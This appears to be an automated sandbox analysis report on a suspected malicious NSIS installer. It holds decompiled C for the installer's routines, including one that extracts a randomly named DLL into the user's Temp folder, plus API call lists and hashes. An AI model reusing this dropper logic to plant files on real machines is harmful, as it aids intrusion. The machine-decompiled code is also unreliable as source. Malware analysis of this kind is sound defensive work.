                                                                          0x00405af0
                                                                          0x00000000
                                                                          0x00405af0
                                                                          0x00405aca
                                                                          0x00405acf
                                                                          0x00405ad2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405ade
                                                                          0x00000000
                                                                          0x00405a9e
                                                                          0x00405aae
                                                                          0x00405b09
                                                                          0x00405b09
                                                                          0x00405b0c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405b0c
                                                                          0x00405a8d
                                                                          0x00405a8d
                                                                          0x00405b0e
                                                                          0x00405b0e
                                                                          0x00405b15
                                                                          0x00405b19
                                                                          0x00405b19
                                                                          0x00405b1a
                                                                          0x00405b1d
                                                                          0x00405b29
                                                                          0x00405b2f
                                                                          0x00405b31
                                                                          0x00405b50
                                                                          0x00405b50
                                                                          0x00000000
                                                                          0x00405b50
                                                                          0x00405b37
                                                                          0x00405b40
                                                                          0x00405b43
                                                                          0x00405b48
                                                                          0x00405b4c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405b53
                                                                          0x00405b53
                                                                          0x00405b53
                                                                          0x00405b57
                                                                          0x00405b5a
                                                                          0x00405b5c
                                                                          0x00405b60
                                                                          0x00405b66
                                                                          0x00405b66
                                                                          0x00405b60
                                                                          0x00000000
                                                                          0x00405b5a
                                                                          0x00405a8b
                                                                          0x00405be2
                                                                          0x00405bec
                                                                          0x00405bf8
                                                                          0x00405bf8
                                                                          0x00000000

                                                                          APIs
                                                                          • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                                                          • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                                                          • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
                                                                          • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078ED38,00789938), ref: 00405BBA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                                                          • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 4227507514-3711765563
                                                                          • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                          • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                                                          • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                          • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100memoryfilestringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 32%
                                                                          			E004026FA() {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405538(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054CC(E004059BF("C:\Users\hardz\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll", "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a018;
				} else {
					_push(0x40a018);
					E004059BF();
				}
				E00405BFB(_t55);
				_t28 = E00405690(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x7a2f8c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E004030FF(_t48);
						E004030CD(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							_push( *(_t60 - 0x1c));
							_push(_t58);
							_push(_t48);
							_push( *((intOrPtr*)(_t60 - 0x20)));
							E00402EBD();
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						_push(_t48);
						_push(_t48);
						_push( *(_t60 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a018;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}














                                                                          0x004026fb
                                                                          0x00402707
                                                                          0x0040270a
                                                                          0x00402711
                                                                          0x00402712
                                                                          0x00402737
                                                                          0x0040273c
                                                                          0x00402714
                                                                          0x00402719
                                                                          0x0040271a
                                                                          0x0040271a
                                                                          0x00402742
                                                                          0x0040274f
                                                                          0x00402757
                                                                          0x0040275a
                                                                          0x00402760
                                                                          0x0040276e
                                                                          0x00402773
                                                                          0x00402777
                                                                          0x0040277a
                                                                          0x00402783
                                                                          0x0040278f
                                                                          0x00402793
                                                                          0x00402796
                                                                          0x00402798
                                                                          0x0040279b
                                                                          0x0040279c
                                                                          0x0040279d
                                                                          0x004027a0
                                                                          0x004027bf
                                                                          0x004027ac
                                                                          0x004027b4
                                                                          0x004027b7
                                                                          0x004027bc
                                                                          0x004027bc
                                                                          0x004027c6
                                                                          0x004027c6
                                                                          0x004027d8
                                                                          0x004027df
                                                                          0x004027e5
                                                                          0x004027e6
                                                                          0x004027e7
                                                                          0x004027ea
                                                                          0x004027f1
                                                                          0x004027f1
                                                                          0x004027f7
                                                                          0x004027fd
                                                                          0x004027fd
                                                                          0x00402807
                                                                          0x00402808
                                                                          0x0040280c
                                                                          0x0040280e
                                                                          0x00402814
                                                                          0x00402814
                                                                          0x0040281b
                                                                          0x004021e8
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                                                          • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                                                          • GlobalFree.KERNEL32 ref: 004027C6
                                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                                                          • GlobalFree.KERNEL32 ref: 004027DF
                                                                          • CloseHandle.KERNEL32(?), ref: 004027F7
                                                                          • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                                                            • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                          • API String ID: 3508600917-2721706570
                                                                          • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                          • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                                                          • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                          • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404D62, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 94%
                                                                          			E00404D62(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a2764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
					}
					_t26 = lstrlenA(0x79ed60);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x79ed60;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79ed60)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79ed60, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                          0x00404d68
                                                                          0x00404d74
                                                                          0x00404d77
                                                                          0x00404d7d
                                                                          0x00404d89
                                                                          0x00404d8c
                                                                          0x00404d8f
                                                                          0x00404d95
                                                                          0x00404d95
                                                                          0x00404d9b
                                                                          0x00404da3
                                                                          0x00404da6
                                                                          0x00404dc3
                                                                          0x00404dc7
                                                                          0x00404dd0
                                                                          0x00404dd0
                                                                          0x00404dda
                                                                          0x00404de3
                                                                          0x00404def
                                                                          0x00404df6
                                                                          0x00404dfa
                                                                          0x00404dfd
                                                                          0x00404e10
                                                                          0x00404e1e
                                                                          0x00404e1e
                                                                          0x00404e22
                                                                          0x00404e24
                                                                          0x00404e27
                                                                          0x00000000
                                                                          0x00404e27
                                                                          0x00404da8
                                                                          0x00404db0
                                                                          0x00404db8
                                                                          0x00404dbe
                                                                          0x00000000
                                                                          0x00404dbe
                                                                          0x00404db8
                                                                          0x00404da6
                                                                          0x00404e31

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                          • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                          • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                          • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID: `y
                                                                          • API String ID: 2531174081-1740403070
                                                                          • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                          • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
                                                                          • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                          • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405BFB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00405BFB(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405538(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                          0x00405bfd
                                                                          0x00405c05
                                                                          0x00405c19
                                                                          0x00405c19
                                                                          0x00405c1f
                                                                          0x00405c2c
                                                                          0x00405c2c
                                                                          0x00405c2d
                                                                          0x00405c2f
                                                                          0x00405c33
                                                                          0x00405c35
                                                                          0x00405c3e
                                                                          0x00405c40
                                                                          0x00405c5a
                                                                          0x00405c62
                                                                          0x00405c62
                                                                          0x00405c67
                                                                          0x00405c69
                                                                          0x00405c6b
                                                                          0x00405c6f
                                                                          0x00405c70
                                                                          0x00405c73
                                                                          0x00405c7b
                                                                          0x00405c7d
                                                                          0x00405c81
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405c87
                                                                          0x00405c8c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405c8c
                                                                          0x00405c91

                                                                          APIs
                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                          • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                          • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                          • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                                                          • *?|<>/":, xrefs: 00405C43
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                          • API String ID: 589700163-489697304
                                                                          • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                          • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
                                                                          • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                          • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403E0E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                          0x00403e20
                                                                          0x00403eb4
                                                                          0x00000000
                                                                          0x00403eb4
                                                                          0x00403e31
                                                                          0x00403e35
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403e3b
                                                                          0x00403e44
                                                                          0x00403e47
                                                                          0x00403e47
                                                                          0x00403e4d
                                                                          0x00403e53
                                                                          0x00403e53
                                                                          0x00403e5f
                                                                          0x00403e65
                                                                          0x00403e6c
                                                                          0x00403e6f
                                                                          0x00403e72
                                                                          0x00403e74
                                                                          0x00403e74
                                                                          0x00403e7c
                                                                          0x00403e82
                                                                          0x00403e82
                                                                          0x00403e8c
                                                                          0x00403e91
                                                                          0x00403e94
                                                                          0x00403e99
                                                                          0x00403e9c
                                                                          0x00403e9c
                                                                          0x00403eac
                                                                          0x00403eac
                                                                          0x00000000

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                          • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
                                                                          • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                          • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059BF(0x40a018,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a018, 0x40901c);
					lstrcatA(0x40a018,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405707( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






                                                                          0x00401674
                                                                          0x00401684
                                                                          0x00401688
                                                                          0x00401690
                                                                          0x004016a7
                                                                          0x004016af
                                                                          0x004016b8
                                                                          0x004016b8
                                                                          0x004016cb
                                                                          0x004016d7
                                                                          0x004026da
                                                                          0x004016ed
                                                                          0x004016f3
                                                                          0x004016f8
                                                                          0x00000000
                                                                          0x004016f8
                                                                          0x004016cd
                                                                          0x004016cd
                                                                          0x004021e8
                                                                          0x004021e8
                                                                          0x004021e8
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                            • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,?,000000DF,000000D0), ref: 00401690
                                                                          • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,?,000000DF,000000D0), ref: 0040169A
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,?,000000DF,000000D0), ref: 004016AF
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,?,000000DF,000000D0), ref: 004016B8
                                                                            • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ), ref: 00405CA2
                                                                            • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                            • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                            • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                            • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                            • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405765
                                                                            • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405782
                                                                            • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                                                            • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                            • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
